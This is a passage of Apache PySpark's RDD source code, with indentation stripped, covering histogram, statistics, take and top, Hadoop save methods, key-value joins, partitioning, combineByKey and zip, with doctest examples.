if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from a RDD.
Note that this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
Note: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from a RDD ordered in ascending order or as
specified by the optional key function.
Note that this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and use the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Note that this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
Translated from the Scala implementation in RDD#take().
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
# the first paramter of max is >=1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all. Note that an RDD
may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
@ignore_unicode_prefix
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
@param path: path to text file
@param compressionCodecClass: (None by default) string i.e.
"org.apache.hadoop.io.compress.GzipCodec"
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> b''.join(result).decode('utf-8')
u'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, (unicode, bytes)):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
Note that this method should only be used if the resulting data is expected
to be small, as all the data is loaded into the driver's memory.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(self, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative and commutative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
Default partitioner is hash-partition.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative and commutative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as default, because builtin hash of None is different
# cross machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid too huge objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None, partitionFunc=portable_hash):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C. Note that V and C can be different -- for example, one might
group an RDD of type (Int, Int) into an RDD of type (Int, List[Int]).
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one.
In addition, users can control the partitioning of the output RDD.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> def add(a, b): return a + str(b)
>>> sorted(x.combineByKey(str, add, add).collect())
[('a', '11'), ('b', '1')]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None,
partitionFunc=portable_hash):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's, The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc)
def foldByKey(self, zeroValue, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication.).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions,
partitionFunc)
def _memory_limit(self):
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None, partitionFunc=portable_hash):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
Note: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def groupByKey(it):
merger = ExternalGroupBy(agg, memory, serializer)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom parittioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
jrdd = self._jrdd.repartition(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
jrdd = self._jrdd.coalesce(numPartitions, shuffle)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
first element in each RDD second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in JVM if there are different number
# of items in each partitions.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
more than one partitions.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
L{zipWithIndex}
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
